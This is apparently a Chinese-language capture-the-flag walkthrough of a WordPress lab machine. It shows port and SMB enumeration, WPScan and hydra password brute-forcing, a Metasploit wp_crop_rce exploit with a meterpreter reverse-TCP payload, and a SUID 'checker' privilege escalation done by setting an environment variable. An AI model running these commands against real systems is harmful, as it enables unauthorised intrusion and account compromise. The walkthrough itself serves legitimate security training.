1、端口信息扫描
🚀 nmap -p- -T4 -sC -sV -vvv -oA nmap/scan $IP PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3hfvTN6e0P9PLtkjW4dy+6vpFSh1PwKRZrML7ArPzhx1yVxBP7kxeIt3lX/qJWpxyhlsQwoLx8KDYdpOZlX5Br1PskO6H66P+AwPMYwooSq24qC/Gxg4NX9MsH/lzoKnrgLDUaAqGS5ugLw6biXITEVbxrjBNdvrT1uFR9sq+Yuc1JbkF8dxMF51tiQF35g0Nqo+UhjmJJg73S/VI9oQtYzd2GnQC8uQxE8Vf4lZpo6ZkvTDQ7om3t/cvsnNCgwX28/TRcJ53unRPmos13iwIcuvtfKlrP5qIY75YvU4U9nmy3+tjqfB1e5CESMxKjKesH0IJTRhEjAyxjQ1HUINP | 256 c2:64:ef🆎b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJtovk1nbfTPnc/1GUqCcdh8XLsFpDxKYJd96BdYGPjEEdZGPKXv5uHnseNe1SzvLZBoYz7KNpPVQ8uShudDnOI= | 256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICfVpt7khg8YIghnTYjU1VgqdsCRVz7f1Mi4o4Z45df8 80/tcp open http syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu)) |_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E |_http-generator: WordPress 5.0 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-robots.txt: 1 disallowed entry |_/wp-admin/ |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Billy Joel's IT Blog – The IT blog 139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP) Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 4s, deviation: 0s, median: 3s | nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | Names: | BLOG<00> Flags: <unique><active> | BLOG<03> Flags: <unique><active> | BLOG<20> Flags: <unique><active> | \x01\x02__MSBROWSE__\x02<01> Flags: <group><active> | WORKGROUP<00> Flags: <group><active> | WORKGROUP<1d> Flags: <unique><active> | WORKGROUP<1e> Flags: <group><active> | Statistics: | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 33922/tcp): CLEAN (Couldn't connect) | Check 2 (port 35876/tcp): CLEAN (Couldn't connect) | Check 3 (port 9200/udp): CLEAN (Failed to receive data) | Check 4 (port 23163/udp): CLEAN (Failed to receive data) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6-Ubuntu) | Computer name: blog | NetBIOS computer name: BLOG\x00 | Domain name: \x00 | FQDN: blog |_ System time: 2020-07-11T20:02:25+00:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-07-11T20:02:25 |_ start_date: N/A
从返回的结果中,我们可以发现其在80端口搭建了wordpress,而同时开启了139和445端口,我们可以通过查看SMB服务来查看是否有任何共享的内容。
2、查看网站信息
通过查看网站,我们可以该网站的创建者叫做Billy,并且Billy的用户名为bjoel,这个名字很有可能会是该主机上的用户名,而billy的妈妈的用户名是kwheel,因此我们可以把该名字收集下来,保存到username.txt文件中,以用于未来登录主机做准备。
3、SMB枚举
由于我们在端口扫描时,发现其在139和445端口上开放了SMB文件共享服务,因此我们可以使用smbmap扫描工具查找该主机上的共享文件夹。
smbmap -H $ip
现在枚举后发现有一个叫BillySMB的共享文件夹,Billy这个名字,刚好和我们在网站上发现的名字相一致。现在我们希望将该文件给下载下来,查看里面是否有什么异常。
smbclient //10.10.143.250/BillySMB Password for [WORKGROUP\root]: Try "help" to get a list of possible commands. smb: \> dir . D 0 Wed Mar 22 12:05:59 2023 .. D 0 Wed May 27 01:58:23 2020 Alice-White-Rabbit.jpg N 33378 Wed May 27 02:17:01 2020 tswift.mp4 N 1236733 Wed May 27 02:13:45 2020 check-this.png N 3082 Wed May 27 02:13:43 2020 15413192 blocks of size 1024. 9790380 blocks available smb: \> get . NT_STATUS_OBJECT_NAME_INVALID opening remote file \. smb: \> get Alice-White-Rabbit.jpg AntSword-Loader/ backup/ ddd/ hack_the_box/ hzh.ovpn smb: \> get Alice-White-Rabbit.jpg AntSword-Loader/ backup/ ddd/ hack_the_box/ hzh.ovpn smb: \> get Alice-White-Rabbit.jpg getting file \Alice-White-Rabbit.jpg of size 33378 as Alice-White-Rabbit.jpg (15.8 KiloBytes/sec) (average 15.8 KiloBytes/sec) smb: \> get tswift.mp4 getting file \tswift.mp4 of size 1236733 as tswift.mp4 (288.6 KiloBytes/sec) (average 198.4 KiloBytes/sec) smb: \> get check-this.png getting file \check-this.png of size 3082 as check-this.png (1.9 KiloBytes/sec) (average 158.5 KiloBytes/sec)
我们注意到里面有一张jpg文件,我们可使用
steghide
这款隐写工具,尝试着将里面的信息给破解出来。steghide extract -sf Alice-White-Rabbit.jpg cat rabbit_hole.txt You've found yourself in a rabbit hole, friend.
4、WPScan
首先使用wpscan这款专门扫描wordpress的工具,来扫描网站的用户名都有哪些。
─# wpscan --url http://blog.thm -e u _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.22 @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] Updating the Database ... [i] Update completed. [+] URL: http://blog.thm/ [10.10.143.250] [+] Started: Wed Mar 22 12:51:05 2023 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.29 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] robots.txt found: http://blog.thm/robots.txt | Interesting Entries: | - /wp-admin/ | - /wp-admin/admin-ajax.php | Found By: Robots Txt (Aggressive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://blog.thm/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://blog.thm/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://blog.thm/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://blog.thm/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.0 identified (Insecure, released on 2018-12-06). | Found By: Rss Generator (Passive Detection) | - http://blog.thm/feed/, <generator>https://wordpress.org/?v=5.0</generator> | - http://blog.thm/comments/feed/, <generator>https://wordpress.org/?v=5.0</generator> [+] WordPress theme in use: twentytwenty | Location: http://blog.thm/wp-content/themes/twentytwenty/ | Last Updated: 2022-11-02T00:00:00.000Z | Readme: http://blog.thm/wp-content/themes/twentytwenty/readme.txt | [!] The version is out of date, the latest version is 2.1 | Style URL: http://blog.thm/wp-content/themes/twentytwenty/style.css?ver=1.3 | Style Name: Twenty Twenty | Style URI: https://wordpress.org/themes/twentytwenty/ | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | Confirmed By: Css Style In 404 Page (Passive Detection) | | Version: 1.3 (80% confidence) | Found By: Style (Passive Detection) | - http://blog.thm/wp-content/themes/twentytwenty/style.css?ver=1.3, Match: 'Version: 1.3' [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:03 <===================================> (10 / 10) 100.00% Time: 00:00:03 [i] User(s) Identified: [+] kwheel | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] bjoel | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] Karen Wheeler | Found By: Rss Generator (Passive Detection) | Confirmed By: Rss Generator (Aggressive Detection) [+] Billy Joel | Found By: Rss Generator (Passive Detection) | Confirmed By: Rss Generator (Aggressive Detection) [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Wed Mar 22 12:51:29 2023 [+] Requests Done: 70 [+] Cached Requests: 8 [+] Data Sent: 16.336 KB [+] Data Received: 20.028 MB [+] Memory used: 194.332 MB [+] Elapsed time: 00:00:24
扫描结果验证了我们之前在网站上的发现,现在我们可以尝试着使用这两个用户名进行爆破尝试。
使用下列的命令对网站进行爆破尝试:
wpscan --url http://blog.thm -P /usr/share/wordlists/rockyou.txt -U username.txt -t 75
我们可以成功得到keheel的密码是cutiepie1
房间标签暗示了一个CVE(CVE-2019-8943),这是一种漏洞,允许通过
wp_crop_image()
中的路径遍历来编写具有任意路径的文件。
如果我们更深入地了解这个漏洞,我们会发现它需要一个用户帐户。现在我们已经拥有了一个账户和其密码,可以开始对该漏洞进行利用。┌──(root🐦kali)-[/home/sugobet] └─# hydra -L ./test1.txt -P /usr/share/wordlists/rockyou.txt 10.10.44.0 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1:incorrect"
5、CVE-2019-8943
我们可以考虑使用metasploit这个渗透框架来深入到受害者主机上。
我们先通过search来查找关于
wp_crop_image
的攻击模块msf6 > search wp_crop Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/http/wp_crop_rce 2019-02-19 excellent Yes WordPress Crop-image Shell Uplo
现在我们可以使用该模块
msf6 > use exploit/multi/http/wp_crop_rce [*] No payload configured, defaulting to php/meterpreter/reverse_tcp msf6 exploit(multi/http/wp_crop_rce) > options Module options (exploit/multi/http/wp_crop_rce): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD yes The WordPress password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/U sing-Metasploit RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the wordpress application USERNAME yes The WordPress username to authenticate with VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 172.21.218.190 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 WordPress
可以看到该攻击模块要求我们输入用户和用户名密码,在这里我们可以设置之前在暴力破解中获得的用户和密码;
6、提权
先查找主机上是否存在具有SUID权限的文件
find / -type f -perm -u+s 2>/dev/null
发现可以程序,
/user/sbin/checker
,进一步查看该文件$ ls -la /usr/sbin/checker -rwsr-sr-x 1 root root 8432 May 26 18:27 /usr/sbin/checker
这是一个属于root用户的SUID文件,因为我们可以考虑使用它来进行提权
$ ltrace checker getenv("admin") = nil puts("Not an Admin") = 13 Not an Admin +++ exited (status 0) +++
这段代码的含义是在"checker"程序中,尝试获取名为"admin"的环境变量的值,但是未能找到该变量,因此输出"Not an Admin"。我们可以将该环境变量替换为一个有效的
$ export admin=1 $ ltrace checker getenv("admin") = "1" setuid(0) = -1 system("/bin/bash"
现在使用checker之后,我们将能够使用root用户身份的终端
$ checker $ id uid=0(root) gid=33(www-data) groups=33(www-data)
接着读取flag即可
$ find / 2>/dev/null | grep user.txt /home/bjoel/user.txt /media/usb/user.txt $ cat /media/usb/user.txt <REDACTED> $ cat /root/root.txt <REDACTED>